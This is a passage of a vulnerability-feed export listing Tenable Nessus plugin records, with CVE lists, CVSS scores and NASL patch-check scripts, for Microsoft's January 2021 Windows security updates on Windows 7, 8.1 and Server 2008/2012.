KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:45:31", "description": "The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598287: Windows Server 2008 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598287.NASL", "href": "https://www.tenable.com/plugins/nessus/144878", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144878);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/20\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598287\");\n script_xref(name:\"MSKB\", value:\"4598288\");\n script_xref(name:\"MSFT\", value:\"MS21-4598287\");\n script_xref(name:\"MSFT\", value:\"MS21-4598288\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598287: Windows Server 2008 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n # https://support.microsoft.com/en-us/help/4598287/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71567e2d\");\n # https://support.microsoft.com/en-us/help/4598288/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cddaa00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598287 or Cumulative Update KB4598288.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1706\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598287', '4598288');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598287, 4598288])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598279.NASL", "href": "https://www.tenable.com/plugins/nessus/144877", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144877);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598279\");\n script_xref(name:\"MSKB\", value:\"4598289\");\n script_xref(name:\"MSFT\", value:\"MS21-4598279\");\n script_xref(name:\"MSFT\", value:\"MS21-4598289\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598279/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598289/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598289 or Cumulative Update KB4598279.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n 